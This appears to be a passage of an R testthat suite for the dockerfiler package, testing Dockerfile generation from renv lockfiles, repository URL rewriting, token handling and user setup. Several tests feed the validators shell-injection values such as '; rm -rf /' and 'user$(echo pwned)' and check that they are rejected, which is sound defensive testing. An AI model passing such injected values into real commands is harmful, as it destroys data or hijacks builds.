  testthat::with_mocked_bindings(code = {
    out <- dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      # Use a non-PPM repos so this fixture-comparison test keeps
      # locking the basic Dockerfile shape; the PPM rewrite has its
      # own dedicated tests.
      repos = c(CRAN = "https://cran.rstudio.com/"),
      renv_version = "0.0.0"
    )
  },
  compact_sysreqs = function(...) "fake sys reqs",
  repos_as_character = function(...) "fake repos"
  )

  expect_s3_class(
    out,
    "Dockerfile"
  )
  expect_s3_class(
    out,
    "R6"
  )

  # read Dockerfile
  out$write(
    file.path(
      dir_build,
      "Dockerfile"
    )
  )

  dock_created <- readLines(
    file.path(
      dir_build,
      "Dockerfile"
    )
  )

  dock_expected <- readLines(
    testthat::test_path("renv_Dockerfile")
  )

  expect_equal(dock_created, dock_expected)

  skip_if(is_rdevel, "Skip R-devel")
  #python3 is not a direct dependencies from custom_packages
  expect_false(  any(grepl("python3",out$Dockerfile)))

})
# rstudioapi::navigateToFile(file.path(dir_build, "Dockerfile"))
#
test_that("dock_from_renv works with full dependencies", {
  # testthat::skip_on_cran()
  # skip_if_not(interactive())
  # Create Dockerfile
skip_if(is_rdevel, "skip on R-devel")
  # pak::pkg_sysreqs(sysreqs_platform = "ubuntu") returns no
  # system_packages on macOS hosts, so the python3 sysreq line is
  # never emitted and the assertion below cannot pass.
  skip_on_os("mac")
  out <- dock_from_renv(
    dependencies = TRUE,
    lockfile = the_lockfile,
    FROM = "rocker/verse",
  )
  expect_s3_class(
    out,
    "Dockerfile"
  )
  expect_s3_class(
    out,
    "R6"
  )
  skip_if(is_rdevel, "Skip R-devel")
  #python3 is  a un-direct dependencies from custom_packages
  expect_true(  any(grepl("python3",out$Dockerfile)))
})
# rstudioapi::navigateToFile(file.path(dir_build, "Dockerfile"))



# repos_as_character ----
test_that("repos_as_character works", {
  out <- dockerfiler:::repos_as_character(
    repos = c(
      RSPM = paste0("https://packagemanager.rstudio.com/all/__linux__/focal/latest"),
      CRAN = "https://cran.rstudio.com/"
    )
  )
  expect_equal(
    out,
    "c(RSPM = 'https://packagemanager.rstudio.com/all/__linux__/focal/latest', CRAN = 'https://cran.rstudio.com/')"
  )
})

# gen_base_image ----
test_that("gen_base_image works", {
  out <- dockerfiler:::gen_base_image(
    r_version = "4.0",
    FROM = "rstudio/r-base"
  )
  expect_equal(out, "rstudio/r-base:4.0")

  out <- dockerfiler:::gen_base_image(
    r_version = "4.0",
    FROM = "rocker/verse"
  )
  expect_equal(out, "rocker/verse:4.0")
})

test_that("dock_from_renv default FROM is rocker/r-ver, default repos is p3m.dev/cran/latest", {
  fmls <- formals(dock_from_renv)
  expect_equal(fmls$FROM, "rocker/r-ver")
  # `formals()` returns the unevaluated default; capture as string.
  expect_equal(
    deparse(fmls$repos),
    'c(CRAN = "https://p3m.dev/cran/latest")'
  )
})

test_that("dock_from_renv defaults produce a multi-arch FROM auto-tagged from the lockfile R version", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    user = NULL,
    renv_version = "0.0.0"
  )
  # Default FROM = rocker/r-ver is untagged; gen_base_image appends
  # the lockfile's R version (4.1.2 in the test setup).
  expect_true("FROM rocker/r-ver:4.1.2" %in% out$Dockerfile)
})

test_that("dock_from_renv defaults trigger the PPM rewrite (codename + UA + override)", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    user = NULL,
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  # The default p3m.dev URL must be rewritten to the
  # `__linux__/$VERSION_CODENAME/` shape so the build pulls Linux
  # binaries.
  expect_match(df, "https://p3m\\.dev/cran/__linux__/\\$VERSION_CODENAME/latest")
  # The HTTPUserAgent line must be emitted (PPM serves source if it
  # is missing even with a `__linux__/` URL).
  expect_match(df, "HTTPUserAgent = sprintf\\('R \\(")
  # The renv config repos override must point at the rewritten URL.
  expect_match(df, "renv\\.config\\.repos\\.override = c\\(CRAN = '")
  # The /etc/os-release source must be prefixed on the RUN that uses
  # $VERSION_CODENAME.
  expect_match(df, "\\. /etc/os-release && ")
})

test_that(".patch_rprofile_for_ppm rejects PPM host typos that the (posit|rstudio).(co|com) Cartesian product would have admitted", {
  # `posit.com` and `rstudio.co` are typos -- not real Posit-managed
  # hosts. Without the explicit enumeration, an alternation
  # `(posit|rstudio).(co|com)` matches both and rewrites the URL to a
  # codename form against a host that does not resolve. Lock the
  # explicit host whitelist by exercising both typos.
  skip_if(is_rdevel, "skip on R-devel")
  for (typo_url in c(
    "https://packagemanager.posit.com/cran/latest",
    "https://packagemanager.rstudio.co/cran/latest"
  )) {
    out <- dock_from_renv(
      lockfile = the_lockfile,
      user = NULL,
      repos = setNames(typo_url, "CRAN"),
      renv_version = "0.0.0"
    )
    df <- paste(out$Dockerfile, collapse = "\n")
    expect_false(
      grepl("__linux__", df, fixed = TRUE),
      info = sprintf(
        "PPM rewrite incorrectly fired on typo host %s",
        typo_url
      )
    )
  }
})

test_that(".validate_r_version accepts R-devel, release-candidate and Patched lockfile shapes", {
  # renv records these forms in real lockfiles. The post-#109
  # validator originally rejected them, blocking the user from
  # `dock_from_renv()` whenever the new `FROM = "rocker/r-ver"`
  # default routed through the auto-tag path.
  expect_silent(dockerfiler:::.validate_r_version("4.5"))
  expect_silent(dockerfiler:::.validate_r_version("4.5.0"))
  expect_silent(dockerfiler:::.validate_r_version("4.5.0-RC"))
  expect_silent(dockerfiler:::.validate_r_version("r-devel"))
  expect_silent(dockerfiler:::.validate_r_version("3.6.0 Patched"))
  # Still reject obvious garbage / shell metacharacters.
  expect_error(
    dockerfiler:::.validate_r_version("4.5; rm -rf /"),
    "r_version"
  )
  expect_error(
    dockerfiler:::.validate_r_version(""),
    "r_version"
  )
  # The "<X.Y.Z> Patched" branch matches a single literal space only:
  # a newline or tab between the version and "Patched" would otherwise
  # slip through (R's `\\s` matches `\n` / `\t`) and produce a
  # two-line FROM directive in the generated Dockerfile.
  expect_error(
    dockerfiler:::.validate_r_version("4.5.0\nPatched"),
    "r_version"
  )
  expect_error(
    dockerfiler:::.validate_r_version("4.5.0\tPatched"),
    "r_version"
  )
})

test_that(".patch_rprofile_for_ppm matches all three current PPM host shapes", {
  for (host in c(
    "packagemanager.rstudio.com",
    "packagemanager.posit.co",
    "p3m.dev"
  )) {
    skip_if(is_rdevel, "skip on R-devel")
    out <- dock_from_renv(
      lockfile = the_lockfile,
      user = NULL,
      repos = setNames(
        sprintf("https://%s/cran/latest", host),
        "CRAN"
      ),
      renv_version = "0.0.0"
    )
    df <- paste(out$Dockerfile, collapse = "\n")
    expect_match(
      df,
      sprintf("https://%s/cran/__linux__/\\$VERSION_CODENAME/latest", host),
      info = sprintf("PPM rewrite did not fire on host %s", host)
    )
  }
})

test_that("gen_base_image preserves an already-pinned tag instead of appending r_version", {
  # Without the guard, `gen_base_image(FROM = "rocker/r-base:4.5", r_version = "4.1.2")`
  # returned "rocker/r-base:4.5:4.1.2" -- an invalid image reference.
  expect_equal(
    dockerfiler:::gen_base_image(
      r_version = "4.1.2",
      FROM = "rocker/r-base:4.5"
    ),
    "rocker/r-base:4.5"
  )
  # Same protection for sha256 digests.
  expect_equal(
    dockerfiler:::gen_base_image(
      r_version = "4.1.2",
      FROM = "rocker/r-base@sha256:abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789"
    ),
    "rocker/r-base@sha256:abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789"
  )
  # Untagged FROM still gets the r_version appended.
  expect_equal(
    dockerfiler:::gen_base_image(
      r_version = "4.1.2",
      FROM = "rocker/r-base"
    ),
    "rocker/r-base:4.1.2"
  )
})

test_that("gen_base_image warns when the deprecated `distro` is supplied", {
  expect_warning(
    out <- dockerfiler:::gen_base_image(
      distro = "xenial",
      r_version = "4.0",
      FROM = "rocker/verse"
    ),
    "distro"
  )
  # Even though the deprecation fires, the resulting image string still
  # comes from FROM + r_version (distro is dead).
  expect_equal(out, "rocker/verse:4.0")
})





test_that("dock_from_renv works with specific renv", {

  skip_if(is_rdevel, "skip on R-devel")
  # testthat::skip_on_cran()
the_lockfile1.0.0 <- system.file("renv_with_1.0.0.lock",package = "dockerfiler")

for (lf in list(the_lockfile,the_lockfile1.0.0)){
for (renv_version in list(NULL,"1.2.3","missing")){


  if (!is.null(renv_version) && renv_version == "missing") {
    out <- dock_from_renv(lockfile = lf,
                          FROM = "rocker/verse")
  } else{
    out <- dock_from_renv(
      lockfile = lf,
      FROM = "rocker/verse",
      renv_version = renv_version
    )

  }
socle_install_version <- "remotes::install_version\\(\"renv\", version = \""
  if (lf == the_lockfile &    is.null(renv_version)) {
    test_string <- 'install.packages\\(\"renv\"\\)'
  } else if (lf == the_lockfile1.0.0 & is.null(renv_version)) {
    test_string <- 'install.packages\\(\"renv\"\\)'
  } else if (lf == the_lockfile &  renv_version == "1.2.3") {
    test_string <-  paste0(socle_install_version,"1.2.3"  ,"\"\\)")
  } else if (lf == the_lockfile1.0.0 & renv_version == "1.2.3") {
    test_string <- paste0(socle_install_version,"1.2.3","\"\\)")
  } else if (lf == the_lockfile & renv_version == "missing") {
    # When the lockfile does not pin renv, we install the latest from
    # the configured repos (same behaviour as renv_version = NULL).
    test_string <- 'install.packages\\(\"renv\"\\)'
  } else if (lf == the_lockfile1.0.0 & renv_version == "missing") {
    test_string <-paste0(socle_install_version,"1.0.0","\"\\)")
  }

  expect_true( any(   grepl(test_string , out$Dockerfile)    ),
               info = paste(lf," & ",renv_version))

  installs_latest <- is.null(renv_version) ||
    (identical(renv_version, "missing") && lf == the_lockfile)
  if (installs_latest) {
    # When using the latest renv, `remotes` must not be installed at
    # all. Tighter regex than `grepl("remotes", ...)` so we don't
    # false-positive on incidental occurrences of the substring (e.g.
    # a host name) elsewhere in the Dockerfile.
    expect_false(
      any(grepl("install\\.packages\\([^)]*remotes", out$Dockerfile)),
      info = paste(lf, " & ", renv_version, " => no remotes install")
    )
    expect_false(
      any(grepl("remotes::install_version", out$Dockerfile)),
      info = paste(lf, " & ", renv_version, " => no remotes::install_version")
    )
  }

}}




})

test_that("dock_from_renv injects PPM HTTPUserAgent, codename and renv override when repos is PPM", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = "https://packagemanager.posit.co/cran/latest"),
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "__linux__/\\$VERSION_CODENAME/")
  expect_match(df, "HTTPUserAgent = sprintf\\('R \\(")
  expect_match(df, "\\. /etc/os-release && ")
  expect_match(df, "renv\\.config\\.repos\\.override = c\\(CRAN = '")
  # Lock the UA escape level: the Dockerfile must contain literal
  # `R.Version()\$platform` so bash's `echo "..."` emits a `$` (which R
  # then evaluates correctly in Rprofile.site).
  expect_match(df, "R.Version()\\$platform", fixed = TRUE)
  expect_match(df, "R.Version()\\$arch", fixed = TRUE)
  expect_match(df, "R.Version()\\$os", fixed = TRUE)
})

test_that("dock_from_renv leaves non-PPM repos untouched", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = "https://cran.rstudio.com/"),
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_false(any(grepl("__linux__", out$Dockerfile)))
  expect_false(any(grepl("HTTPUserAgent", out$Dockerfile)))
  expect_false(any(grepl("/etc/os-release", out$Dockerfile)))
  expect_false(any(grepl("renv\\.config\\.repos\\.override", out$Dockerfile)))
})

test_that("dock_from_renv preserves user-pinned PPM codename", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = "https://packagemanager.posit.co/cran/__linux__/jammy/latest"),
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "__linux__/jammy/", fixed = TRUE)
  expect_false(any(grepl("\\$VERSION_CODENAME", out$Dockerfile)))
  expect_match(df, "HTTPUserAgent = sprintf")
  # The override must reference the user-pinned URL, not the codename URL.
  expect_match(
    df,
    "renv.config.repos.override = c(CRAN = 'https://packagemanager.posit.co/cran/__linux__/jammy/latest')",
    fixed = TRUE
  )
})

test_that("dock_from_renv preserves a PPM snapshot-date URL", {
  skip_if(is_rdevel, "skip on R-devel")
  snapshot_url <- "https://packagemanager.posit.co/cran/2024-01-15"
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = snapshot_url),
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  # The snapshot date must survive (no clobbering to /latest).
  expect_match(df, "cran/2024-01-15", fixed = TRUE)
  expect_false(any(grepl("\\$VERSION_CODENAME", out$Dockerfile)))
  expect_false(any(grepl("/etc/os-release", out$Dockerfile)))
  # The override must reference the user URL, not the codename URL.
  expect_match(
    df,
    sprintf(
      "renv.config.repos.override = c(CRAN = '%s')",
      snapshot_url
    ),
    fixed = TRUE
  )
  # User-Agent is still useful with PPM regardless of URL form.
  expect_match(df, "HTTPUserAgent = sprintf")
})

test_that("dock_from_renv leaves multi-entry repos vectors untouched", {
  skip_if(is_rdevel, "skip on R-devel")
  # The PPM patch is intentionally limited to a single CRAN-keyed PPM URL;
  # multi-entry vectors fall through unmodified (back-compat / no surprises).
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(
      RSPM = "https://packagemanager.posit.co/cran/latest",
      CRAN = "https://cran.rstudio.com/"
    ),
    renv_version = "0.0.0"
  )
  expect_false(any(grepl("__linux__", out$Dockerfile)))
  expect_false(any(grepl("HTTPUserAgent", out$Dockerfile)))
  expect_false(any(grepl("/etc/os-release", out$Dockerfile)))
  expect_false(any(grepl("renv\\.config\\.repos\\.override", out$Dockerfile)))
})

test_that(".patch_rprofile_for_ppm is idempotent", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = "https://packagemanager.posit.co/cran/latest"),
    renv_version = "0.0.0"
  )
  before <- out$Dockerfile
  # Re-applying the helper must be a no-op: each mutation is gated by
  # the absence of its target token.
  dockerfiler:::.patch_rprofile_for_ppm(
    out,
    repos = c(CRAN = "https://packagemanager.posit.co/cran/latest")
  )
  expect_identical(out$Dockerfile, before)
})

test_that("dock_from_renv handles a trailing slash on cran/latest/", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = "https://packagemanager.posit.co/cran/latest/"),
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  # Trailing slash must not block the codename rewrite.
  expect_match(df, "__linux__/\\$VERSION_CODENAME/")
  expect_match(df, "HTTPUserAgent = sprintf")
})

test_that("dock_from_renv preserves the user's PPM host on rewrite", {
  skip_if(is_rdevel, "skip on R-devel")
  # rstudio.com (the legacy alias) must not be silently rewritten to
  # posit.co; the user's scheme + host is preserved.
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    repos = c(CRAN = "https://packagemanager.rstudio.com/cran/latest"),
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(
    df,
    "packagemanager.rstudio.com/cran/__linux__/$VERSION_CODENAME/latest",
    fixed = TRUE
  )
  expect_false(grepl("packagemanager.posit.co", df, fixed = TRUE))
})

test_that("dock_from_renv emits no GITHUB_PAT plumbing by default", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_false(grepl("GITHUB_PAT", df))
  expect_false(grepl("--mount=type=secret", df, fixed = TRUE))
})

test_that("dock_from_renv emits ARG/ENV GITHUB_PAT when github_pat = 'build_arg'", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0",
    github_pat = "build_arg"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "ARG GITHUB_PAT", fixed = TRUE)
  expect_match(df, 'ENV "GITHUB_PAT"="${GITHUB_PAT}"', fixed = TRUE)
  expect_false(grepl("--mount=type=secret", df, fixed = TRUE))
})

test_that("dock_from_renv emits a secret mount on restore() when github_pat = 'secret'", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0",
    github_pat = "secret"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_false(grepl("ARG GITHUB_PAT", df, fixed = TRUE))
  expect_false(grepl('ENV "GITHUB_PAT"', df, fixed = TRUE))
  expect_match(
    df,
    "--mount=type=secret,id=github_pat GITHUB_PAT=$(cat /run/secrets/github_pat)",
    fixed = TRUE
  )
  # The renv cache mount must coexist with the secret mount on the same RUN.
  # Cache target uses ${RENV_PATHS_CACHE} since renv_paths_cache landed.
  expect_match(
    df,
    "--mount=type=cache,id=renv-cache,target=${RENV_PATHS_CACHE} --mount=type=secret,id=github_pat GITHUB_PAT=$(cat /run/secrets/github_pat) R -e 'renv::restore()'",
    fixed = TRUE
  )
})

test_that("dock_from_renv emits the RENV_PATHS_CACHE build-arg by default", {
  skip_if(is_rdevel, "skip on R-devel")
  # Default user is "rstudio", so the default cache is auto-derived
  # to /home/rstudio. The build-arg, env and cache-mount tokens are
  # locked here regardless of which user the auto-derive picks.
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "ARG RENV_PATHS_CACHE=/home/rstudio/.cache/R/renv", fixed = TRUE)
  expect_match(df, 'ENV "RENV_PATHS_CACHE"="${RENV_PATHS_CACHE}"', fixed = TRUE)
  expect_match(
    df,
    "--mount=type=cache,id=renv-cache,target=${RENV_PATHS_CACHE}",
    fixed = TRUE
  )
})

test_that("dock_from_renv honors a custom renv_paths_cache path", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_paths_cache = "/srv/renv-cache",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  # Only the build-arg default changes -- the ENV value and the mount
  # target keep referencing the variable, so users overriding the path
  # at `docker build --build-arg RENV_PATHS_CACHE=...` still take effect
  # even if they don't change the dockerfile generation defaults.
  expect_match(df, "ARG RENV_PATHS_CACHE=/srv/renv-cache", fixed = TRUE)
  expect_match(df, 'ENV "RENV_PATHS_CACHE"="${RENV_PATHS_CACHE}"', fixed = TRUE)
  expect_match(
    df,
    "--mount=type=cache,id=renv-cache,target=${RENV_PATHS_CACHE}",
    fixed = TRUE
  )
  # The hard-coded /root/.cache/R/renv path must NOT remain in the file.
  expect_false(grepl("target=/root/.cache/R/renv", df, fixed = TRUE))
})

test_that("dock_from_renv emits a USER directive when `user` is non-NULL", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0",
    user = "rstudio"
  )
  expect_true(any(out$Dockerfile == "USER rstudio"))
})

test_that("dock_from_renv with sysreqs = FALSE skips sysreq computation and emits no apt-get install", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0",
    sysreqs = FALSE
  )
  df <- out$Dockerfile
  expect_false(any(grepl("apt-get install", df)))
  expect_false(any(grepl("apt-get update", df)))
})

test_that("dock_from_renv with sysreqs = FALSE + extra_sysreqs emits an apt-get install for the extras", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0",
    sysreqs = FALSE,
    extra_sysreqs = c("libsodium-dev", "libxml2-dev")
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  # The two extras must end up in a compact apt-get install RUN.
  expect_match(df, "apt-get install -y[^\n]*libsodium-dev")
  expect_match(df, "apt-get install -y[^\n]*libxml2-dev")
})

test_that("dock_from_renv with expand = TRUE emits one apt-get install RUN per requirement plus update / clean", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0",
    sysreqs = FALSE,
    expand = TRUE,
    extra_sysreqs = c("libsodium-dev", "libxml2-dev")
  )
  df <- out$Dockerfile
  expect_true(any(df == "RUN apt-get update -y"))
  expect_true(any(df == "RUN apt-get install -y libsodium-dev"))
  expect_true(any(df == "RUN apt-get install -y libxml2-dev"))
  expect_true(any(df == "RUN rm -rf /var/lib/apt/lists/*"))
})

test_that(".patch_rprofile_for_ppm returns invisibly when no Rprofile.site tee line is present", {
  # Build a minimal dock that does NOT contain the `tee /usr/local/lib/R/etc/Rprofile.site` line
  # so the defensive `length(rps_idx) != 1L` guard fires. The function must
  # return invisible(NULL) without altering the dock.
  dock <- Dockerfile$new(FROM = "plop")
  before <- dock$Dockerfile
  res <- dockerfiler:::.patch_rprofile_for_ppm(
    dock,
    repos = c(CRAN = "https://packagemanager.posit.co/cran/latest")
  )
  expect_null(res)
  expect_identical(dock$Dockerfile, before)
})

test_that(".patch_rprofile_for_ppm returns invisibly when more than one Rprofile.site tee line is present", {
  # The other half of the `length(rps_idx) != 1L` guard: when a dock
  # already carries two RUN lines that match the Rprofile.site tee
  # pattern (which would happen if a caller injected an extra
  # configuration RUN before the patch), the function must refuse to
  # rewrite either of them.
  dock <- Dockerfile$new(FROM = "plop")
  dock$RUN(
    "echo \"options(repos = c(CRAN = 'https://packagemanager.posit.co/cran/latest'), download.file.method = 'libcurl', Ncpus = 4)\" | tee /usr/local/lib/R/etc/Rprofile.site | tee /usr/lib/R/etc/Rprofile.site"
  )
  dock$RUN(
    "echo \"options(repos = c(CRAN = 'https://packagemanager.posit.co/cran/latest'), download.file.method = 'libcurl', Ncpus = 4)\" | tee /usr/local/lib/R/etc/Rprofile.site | tee /usr/lib/R/etc/Rprofile.site"
  )
  before <- dock$Dockerfile

  res <- dockerfiler:::.patch_rprofile_for_ppm(
    dock,
    repos = c(CRAN = "https://packagemanager.posit.co/cran/latest")
  )

  expect_null(res)
  expect_identical(dock$Dockerfile, before)
})

test_that("dock_from_renv with user = NULL keeps the cache at /root and emits no chown / no USER / no useradd", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    user = NULL,
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "ARG RENV_PATHS_CACHE=/root/\\.cache/R/renv")
  expect_false(grepl("\\bUSER\\b", df))
  expect_false(grepl("chown", df))
  expect_false(grepl("useradd", df))
})

test_that("dock_from_renv with default user emits a defensive useradd at the top of the Dockerfile", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    renv_version = "0.0.0"
  )
  lines <- out$Dockerfile

  # The defensive useradd must be early, well before any RUN that
  # might touch the user. Allowing for the FROM line + a couple of
  # ARG/ENV directives, the useradd should appear within the first
  # few non-FROM lines.
  useradd_idx <- grep(
    "id -u rstudio.*useradd -m -d /home/rstudio -s /bin/bash rstudio",
    lines
  )
  expect_length(useradd_idx, 1L)

  # The useradd RUN must precede any chown / USER / install RUN.
  install_idx <- grep("install\\.packages|install_version", lines)
  user_idx <- grep("^USER ", lines)
  if (length(install_idx) > 0L) {
    expect_lt(useradd_idx, min(install_idx))
  }
  if (length(user_idx) > 0L) {
    expect_lt(useradd_idx, min(user_idx))
  }
})

test_that("dock_from_renv with user = 'rstudio' auto-derives the cache to /home/rstudio/", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    user = "rstudio",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "ARG RENV_PATHS_CACHE=/home/rstudio/\\.cache/R/renv")
  expect_match(df, 'chown -R rstudio:rstudio "\\$\\{RENV_PATHS_CACHE\\}"')
})

test_that("dock_from_renv with user = 'rstudio' orders RUNs correctly: apt-get -> chown -> USER -> renv::restore", {
  skip_if(is_rdevel, "skip on R-devel")
  skip_on_os("mac")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    user = "rstudio",
    renv_version = "0.0.0"
  )
  lines <- out$Dockerfile

  apt_idx <- grep("apt-get install", lines)
  chown_idx <- grep("chown -R rstudio:rstudio", lines)
  user_idx <- grep("^USER rstudio$", lines)
  restore_idx <- grep("renv::restore", lines)

  expect_gt(length(chown_idx), 0L)
  expect_gt(length(user_idx), 0L)
  expect_gt(length(restore_idx), 0L)

  # apt-get must come BEFORE USER (apt-get requires root).
  expect_true(all(apt_idx < user_idx[1]))

  # chown must come BEFORE USER (chown requires root and must
  # run before the privilege drop).
  expect_true(all(chown_idx < user_idx[1]))

  # USER must come BEFORE renv::restore (the cache mount target
  # was chowned to <user>; the restore needs to write to it).
  expect_true(all(user_idx < restore_idx))
})

test_that("dock_from_renv with user + explicit renv_paths_cache honors the explicit path and chowns it", {
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    user = "myapp",
    renv_paths_cache = "/srv/myapp/cache",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "ARG RENV_PATHS_CACHE=/srv/myapp/cache")
  expect_match(df, 'chown -R myapp:myapp "\\$\\{RENV_PATHS_CACHE\\}"')
})

test_that("dock_from_renv rejects shell-injection-prone user values", {
  # `user` is interpolated into Dockerfile RUN commands (id, useradd,
  # chown). Without validation, a caller could pass a string with shell
  # metacharacters or whitespace and either break the generated
  # Dockerfile or inject arbitrary commands at docker build time.
  skip_if(is_rdevel, "skip on R-devel")

  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = "; rm -rf /",
      renv_version = "0.0.0"
    ),
    "POSIX username"
  )
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = "bad user",
      renv_version = "0.0.0"
    ),
    "POSIX username"
  )
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = "user$(echo pwned)",
      renv_version = "0.0.0"
    ),
    "POSIX username"
  )
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = "1starts-with-digit",
      renv_version = "0.0.0"
    ),
    "POSIX username"
  )
  # A colon would break the chown -R user:user round-trip if it ever
  # got through the validation -- exercise it directly.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = "foo:bar",
      renv_version = "0.0.0"
    ),
    "POSIX username"
  )
  # Non-character / wrong length must also fail with the same path.
  expect_error(
    dock_from_renv(
      lockfile = the_lockfile,
      FROM = "rocker/verse",
      user = c("alice", "bob"),
      renv_version = "0.0.0"
    ),
    "POSIX username"
  )
})

test_that("dock_from_renv emits a single RUN combining mkdir and chown with a quoted cache path", {
  # Two safety/hygiene properties locked here:
  # 1. mkdir + chown must run as a single Dockerfile RUN (one image
  #    layer) joined with `&&`.
  # 2. The interpolated `${RENV_PATHS_CACHE}` must be double-quoted so a
  #    build-arg containing whitespace or shell metacharacters cannot
  #    break the command or inject (the env var is caller-overridable
  #    via `--build-arg RENV_PATHS_CACHE=...`).
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    user = "rstudio",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")

  # Single combined RUN (one layer):
  expect_match(
    df,
    'RUN mkdir -p "\\$\\{RENV_PATHS_CACHE\\}" && chown -R rstudio:rstudio "\\$\\{RENV_PATHS_CACHE\\}"'
  )

  # No leftover unquoted standalone mkdir / chown:
  expect_false(grepl("RUN mkdir -p \\$\\{RENV_PATHS_CACHE\\}\\s*$", df))
  expect_false(
    grepl(
      "^RUN chown -R [^:]+:[^ ]+ \\$\\{RENV_PATHS_CACHE\\}\\s*$",
      df,
      perl = TRUE
    )
  )
})

test_that("dock_from_renv with user = 'kevin' parameterises the useradd, cache and chown on 'kevin'", {
  # Locks the invariant that the user-handling logic is fully
  # parameterised on `user` and not hardcoded on "rstudio". Without
  # this, a future refactor that accidentally hardcodes the username
  # would silently regress for any non-rstudio caller.
  skip_if(is_rdevel, "skip on R-devel")
  out <- dock_from_renv(
    lockfile = the_lockfile,
    FROM = "rocker/verse",
    user = "kevin",
    renv_version = "0.0.0"
  )
  df <- paste(out$Dockerfile, collapse = "\n")
  expect_match(df, "id -u kevin >/dev/null 2>&1 \\|\\| useradd -m -d /home/kevin -s /bin/bash kevin")
  expect_match(df, "ARG RENV_PATHS_CACHE=/home/kevin/\\.cache/R/renv")
  expect_match(df, 'chown -R kevin:kevin "\\$\\{RENV_PATHS_CACHE\\}"')
  # The USER directive lives on its own line; check the line vector
  # rather than the paste-collapsed single string.
  expect_true("USER kevin" %in% out$Dockerfile)
  # Negative invariant: no hardcoded "rstudio" leaked into a user-scope
